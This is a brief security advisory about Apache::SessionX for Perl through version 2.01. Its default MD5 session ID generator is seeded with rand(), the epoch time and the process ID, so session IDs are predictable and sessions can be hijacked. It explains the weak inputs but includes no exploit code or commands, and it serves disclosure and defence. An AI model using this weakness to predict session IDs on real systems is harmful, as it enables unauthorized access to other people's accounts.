Apache SessionX Insecure Session ID Generation Vulnerability

A vulnerability exists in Apache::SessionX versions through 2.01 for Perl, where session IDs are generated insecurely. The default session ID generator in Apache::SessionX::Generate::MD5 creates an MD5 hash that is predictable, as it is seeded with the built-in rand() function, the epoch time, and the process ID (PID). The PID is drawn from a limited range of values, and the epoch time can be estimated unless it is disclosed in the HTTP Date header. The use of the rand() function, which is not suitable for cryptographic purposes, further compromises the randomness of the session IDs. This predictability could allow an attacker to hijack sessions and gain unauthorized access to systems.

Impact

The vulnerability leads to the generation of predictable session IDs, which could be exploited by an attacker to gain unauthorized access to systems by hijacking sessions.